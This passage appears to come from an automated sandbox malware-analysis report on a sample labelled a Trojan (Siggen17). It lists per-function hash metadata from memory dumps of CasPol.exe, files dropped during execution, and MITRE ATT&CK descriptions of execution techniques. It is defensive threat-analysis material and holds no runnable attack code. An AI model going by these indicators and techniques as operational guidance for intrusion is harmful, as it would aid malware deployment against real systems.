Opcode Fuzzy Hash: 4aa45956999f119c4a03fb10ee3d2e44a08819d0c9f43870426928f4076a4e3b
Instruction Fuzzy Hash: B6113075F402209BCB407FB8848C75E7AF5AF8C291B158526D90AD3344EF349902CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 1D66EEC9 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b2af28a15abb0a19806001f3c20ef34489dc005145489e63be4f876a8ad821
Instruction ID: f0179bd827826c6658e13c91b5a4fd05f16e4174c251c38e3769dd99d046fbe3
Opcode Fuzzy Hash: c9b2af28a15abb0a19806001f3c20ef34489dc005145489e63be4f876a8ad821
Instruction Fuzzy Hash: E7210734A05328CFCB25EF20D8986DAB771FF89315F1081EAD44AA2355CB329E81CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D66EF07 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f795d30597c7c45e6af19bf6fedda2a2298fc3b602df5f97707f9fec2f011730
Instruction ID: e57ed8298eac10b4d4376eaa512b6133845268f13d7fb21fb9ddb9ca542732be
Opcode Fuzzy Hash: f795d30597c7c45e6af19bf6fedda2a2298fc3b602df5f97707f9fec2f011730
Instruction Fuzzy Hash: 9721C474A05328CFCB65EF20D8986DAB7B5BF89315F1081E9D44AA2355CB729E81CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D662800 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d319cd7a93b3b75ee083b618d018384768d114d651e943ddfe8099d74055f6ed
Instruction ID: a470a3d572d7903bc779ae5f8729b95f99b29bcd2a3fcfeaa6f7a2835d50b2f7
Opcode Fuzzy Hash: d319cd7a93b3b75ee083b618d018384768d114d651e943ddfe8099d74055f6ed
Instruction Fuzzy Hash: CC01F5312142345FCB01FBB4D8DDB9D7BB5EF8929A7018866E949C7364DF709A09CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1D66EF51 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e2f0773ff147beee23979dbb471b1e1219b66ee8e9cced2d450f664c94d0bda
Instruction ID: fd00fbd772d9da6466348b5a3e8a8fce286cfe736e8c38c0ed2371e4e1f73e26
Opcode Fuzzy Hash: 3e2f0773ff147beee23979dbb471b1e1219b66ee8e9cced2d450f664c94d0bda
Instruction Fuzzy Hash: B411F874A05328CFCB25EF20D8986D9B775FF49315F1081E9D50AA2341CB715E81CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1D66EF9B Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 334a4528d06eda0a86071c260be9e50deed77620100c709f816b452cbca59a32
Instruction ID: 3691df77ad4f29a6e271b2064030f375c4a390d4b54d95fe436df96905339858
Opcode Fuzzy Hash: 334a4528d06eda0a86071c260be9e50deed77620100c709f816b452cbca59a32
Instruction Fuzzy Hash: 9101D374A05228CFCB65EF64D8986D9B7B5FF89315F1081EAD90AA3301CB719E81CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1D665C78 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f45f6834c5e9311c6f85fbd79e54f16812f253d8c9d4c68d18bfd5554a2b53dd
Instruction ID: 7203044a2e60d94713caa5c0c64c51328454f859d14105b1f0c1a25d0e3f179f
Opcode Fuzzy Hash: f45f6834c5e9311c6f85fbd79e54f16812f253d8c9d4c68d18bfd5554a2b53dd
Instruction Fuzzy Hash: 60F09030E0534DAFCB49EFB8D88068CBBB0AB44604F5085ECD848DB250EB312F45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1D66D7B6 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52ed8906a51f7f341c3e0da2d89eed0405ac45259df331c7ceeb1ab88a68decf
Instruction ID: 5d60d053045d6dcae3de3d9395242a35d6e3d38fd6fc8083fb5f983b93868f99
Opcode Fuzzy Hash: 52ed8906a51f7f341c3e0da2d89eed0405ac45259df331c7ceeb1ab88a68decf
Instruction Fuzzy Hash: CBF03035B052288BDB15ABB084583ED73B2FB98665F204469E506DF384DF76CC56CF41

Uniqueness

Uniqueness Score: -1.00%

Function 1D66EFE5 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479dce23130de34e9e11701753fc329cee5f675783fe901e92f033adb52b4912
Instruction ID: 623d17c4b77b7ca16a983a6ecf2483888bf9efb52f49539d904a0f2f24e43218
Opcode Fuzzy Hash: 479dce23130de34e9e11701753fc329cee5f675783fe901e92f033adb52b4912
Instruction Fuzzy Hash: 01F01474A05228CFCB24EF64D8986C9B7B0FF88315F1041E6D90AA3300CB315E80CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D665C88 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6151b9d52744960814dd64636158aa631668674d8021c5d49532e7fdb40be37c
Instruction ID: d862a3ea5d2081ab3644e2754c8c57e828531d0ae53a17142b2da964f41cac0c
Opcode Fuzzy Hash: 6151b9d52744960814dd64636158aa631668674d8021c5d49532e7fdb40be37c
Instruction Fuzzy Hash: ABF01C30E0520DEFCB48EFA8D88599CBBB1AB45604B6085E9D509EB354EB312F55CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1D66540E Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9203a5ac59dab63394eda1df70e835836c9cb949caf73ccd87d2e47c7d91f6a4
Instruction ID: e8c109de5a007c6663851d67f0268a1e3bbdbec5a1d9b131b8c3c88dcd2a7039
Opcode Fuzzy Hash: 9203a5ac59dab63394eda1df70e835836c9cb949caf73ccd87d2e47c7d91f6a4
Instruction Fuzzy Hash: 35E09BB0D08209CBEB05EF10D5967FD3BB1FB08796F104494C002551A2DB761DD5CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D66F02F Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae30155d46cef31caa990bf507e2b7d7cd5b9058220f9118f1a4e708e0dcf177
Instruction ID: 798c39fcf67b86ee2993c57e7773fa94d62fcabaa9d0e35fbf3f3a11b6b2a5eb
Opcode Fuzzy Hash: ae30155d46cef31caa990bf507e2b7d7cd5b9058220f9118f1a4e708e0dcf177
Instruction Fuzzy Hash: 67F0F278E052288FCB65EF64D8886C8B7B0FF48355F1084E6D919A3200CBB15E80CF41

Uniqueness

Uniqueness Score: -1.00%

Function 1D664BAF Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83a2843b6908ddd8ad8000c52beb105a9c2a992208a4f6e8df9ab2bbb9529f7a
Instruction ID: c8660095baf3d945d1c42fd815e01b85b0048eabaceed2f55e000a352547dd27
Opcode Fuzzy Hash: 83a2843b6908ddd8ad8000c52beb105a9c2a992208a4f6e8df9ab2bbb9529f7a
Instruction Fuzzy Hash: F6E04F7581D2598BCB04EBA0E89A1FDBF74EA11616F40419EDD0A52182EB3215AACF81

Uniqueness

Uniqueness Score: -1.00%

Function 1D665BE1 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eea13532c8f4863a317ff49a2632deabd84803a3218c0113aaff2f93e1b1c82
Instruction ID: 2622900b4f7ab17ae8edf6747007b7e09d9da04c8a53db7dd667f9550a0a3810
Opcode Fuzzy Hash: 9eea13532c8f4863a317ff49a2632deabd84803a3218c0113aaff2f93e1b1c82
Instruction Fuzzy Hash: BDE0DFB050830083C705EF24945068C7B55AF859087988E5C94894F202CF27E4028B91

Uniqueness

Uniqueness Score: -1.00%

Function 1D665470 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aad3519b3b5ed3fedbcc30b2c247e4f96e631795286b27903b8e0d06250ea9c
Instruction ID: ec650c7863d6f64b1845046a3d85520d5eaa0f5229cc818c59d02c6b37ec13ca
Opcode Fuzzy Hash: 3aad3519b3b5ed3fedbcc30b2c247e4f96e631795286b27903b8e0d06250ea9c
Instruction Fuzzy Hash: 18E0C27AD08218CBDB00EB84D5896ECB7B1FB88326F1080A6D91663252C7322D60CF20

Uniqueness

Uniqueness Score: -1.00%

Function 1D665BF0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a899255e63e5d860f70235678600d334de2256c0a8e4ff3b320e7cbda4b80005
Instruction ID: 21d685e803724a59ecf66935a6faa476f81c1ecb12cfbecc6ca6b9492a9f88ac
Opcode Fuzzy Hash: a899255e63e5d860f70235678600d334de2256c0a8e4ff3b320e7cbda4b80005
Instruction Fuzzy Hash: 7CD0C7B020830087CB04EF64C40148D376AAA84A183A98D6C81098F202DB77F8028BE2

Uniqueness

Uniqueness Score: -1.00%

Function 1D664BC0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 375e76326165a44bae5861ac76286e1c91dcdcc314a0ca509e9cc588025915ae
Instruction ID: 8d3f14f1e76c16905bc62e0c3d41fbe23b41a41355b2c2fd0d31af788921de56
Opcode Fuzzy Hash: 375e76326165a44bae5861ac76286e1c91dcdcc314a0ca509e9cc588025915ae
Instruction Fuzzy Hash: DFD012748081198BCB08BB94D45A4FDBB34EB10611F404059D90A52192DA3215AACAC1

Uniqueness

Uniqueness Score: -1.00%

Function 1D6656A1 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a49ff66d4387f517e9d2a74ed86cec4f641f47fbaefbb4bc24133996afb62acb
Instruction ID: ceb3905bf44a7685f743cdfd7b4026152101da025b65f098f31ebe18b8280970
Opcode Fuzzy Hash: a49ff66d4387f517e9d2a74ed86cec4f641f47fbaefbb4bc24133996afb62acb
Instruction Fuzzy Hash: ECE04F740182148BE305EF55C1C67D97BA5A784718F548429C80C0E263D7B7E5658F92

Uniqueness

Uniqueness Score: -1.00%

Function 1D660C40 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63cd77441bcb6c8160133ff507a565dd1d9f88ba35c08cc246d3d9d90ad59299
Instruction ID: aa3538a73c0a470e938d3ad6cce2706f9a4633e9f2eda1e13d123337b657cf16
Opcode Fuzzy Hash: 63cd77441bcb6c8160133ff507a565dd1d9f88ba35c08cc246d3d9d90ad59299
Instruction Fuzzy Hash: BDD017750152648FC7103F70DC9D3243F74EF4A746F0180A5E00582092CF609808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D6656B0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f19b2eeae0f0b4d2f3b55457bf4ac6e30cb28a069ee0196e0ddffe501c541af
Instruction ID: 22709c67729dcc40caa89ef7352129f20aef7482b9c6241fb9d32527deb1a988
Opcode Fuzzy Hash: 7f19b2eeae0f0b4d2f3b55457bf4ac6e30cb28a069ee0196e0ddffe501c541af
Instruction Fuzzy Hash: 49D017B402C2148BE300AB6AC18AA997BA5A749318F448818C50C0A263DBB6F4658BE6

Uniqueness

Uniqueness Score: -1.00%

Function 1D660C50 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac05f4fd797a214f8628db66140b3a47a87cbc84ae7491f148379c523ea6a65f
Instruction ID: d446669222c0bf180db3fc0f6a7ab70fa3fabf4e90cd5d5fd7a85df5e6a47da3
Opcode Fuzzy Hash: ac05f4fd797a214f8628db66140b3a47a87cbc84ae7491f148379c523ea6a65f
Instruction Fuzzy Hash: 83C08C31001128CBCB203BA6DC8E3283BB8FF4C38BB008070E10680591CF602C00CA26

Uniqueness

Uniqueness Score: -1.00%

Function 1D665212 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 308a39d1b94d22d70d924f05b1c267cefc58094cc6aedb1e40064cc8ed4bcb9e
Instruction ID: 4d16c62f4ed368763dfd1936e0a8ed133def523d737757c19644cf4012b0bed4
Opcode Fuzzy Hash: 308a39d1b94d22d70d924f05b1c267cefc58094cc6aedb1e40064cc8ed4bcb9e
Instruction Fuzzy Hash: B9B0123050800D87C708DEC0D4460BC7734E781611B000284D80911441CA331CF08781

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpAzSubmit.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\MpDetoursCopyAccelerator.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vm3ddevapi64-debug.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Drivers\WdFilter.sys	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\NisSrv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpDetours.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpUpdate.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\MpCopyAccelerator.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Drivers\WdDevFlt.sys	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ProtectionManagement.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ConfigSecurityPolicy.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpUxAgent.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSvc.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpRtp.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpDlpCmd.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\DefenderCSP.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\endpointdlp.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MsMpEng.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpasdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpCommu.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpavdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpEvMsg.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\MpDetours.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpavbase.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\endpointdlp.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Drivers\WdBoot.sys	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpAsDesc.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\mpextms.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\MpAsDesc.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpengine.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpCopyAccelerator.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\MpCmdRun.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpasbase.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSenseComm.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpCmdRun.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Drivers\WdNisDrv.sys	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpDetoursCopyAccelerator.dll	Jump to dropped file

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
